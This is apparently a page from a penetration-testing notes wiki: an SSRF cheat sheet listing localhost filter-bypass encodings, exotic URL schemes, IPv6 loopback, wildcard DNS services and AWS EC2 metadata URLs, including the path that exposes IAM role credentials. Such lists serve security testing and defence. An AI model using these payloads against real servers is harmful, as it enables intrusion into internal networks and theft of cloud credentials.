SSRF

http://0177.1/

http://0x7f.1/

http://127.000.000.1

https://520968996

Note: The latter can be calculated using http://www.subnetmask.info/

Exotic Handlers

gopher://, dict://, php://, jar://, tftp://

IPv6

http://[::1]

http://[::]

Wildcard DNS

10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io

Link: http://xip.io

10.0.0.1.nip.io
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io

Link: http://nip.io

AWS EC2 Metadata

http://169.254.169.254/latest/meta-data/

http://169.254.169.254/latest/meta-data/local-hostname

http://169.254.169.254/latest/meta-data/public-hostname

If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role [...]

Link: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html (includes a comprehensive Instance Metadata Categories table)

PreviousRecon NextProof OF Concept (POC): SharePoint Vulnerability Detection

Last updated 10 months ago